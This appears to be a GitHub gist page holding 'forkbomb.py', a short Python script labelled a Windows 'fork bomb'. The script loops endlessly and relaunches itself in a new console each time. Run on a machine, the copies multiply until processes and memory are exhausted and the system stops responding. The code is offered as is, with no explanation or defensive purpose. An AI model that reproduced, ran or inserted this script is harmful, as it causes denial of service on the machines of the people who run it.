Skip to content

Instantly share code, notes, and snippets.

View saleemrashid's full-sized avatar

Saleem Rashid saleemrashid

View GitHub Profile
@saleemrashid
saleemrashid / forkbomb.py
Created January 6, 2017 13:16
Windows "fork bomb" in Python
import subprocess, sys
while True:
subprocess.Popen([sys.executable, sys.argv[0]], creationflags=subprocess.CREATE_NEW_CONSOLE)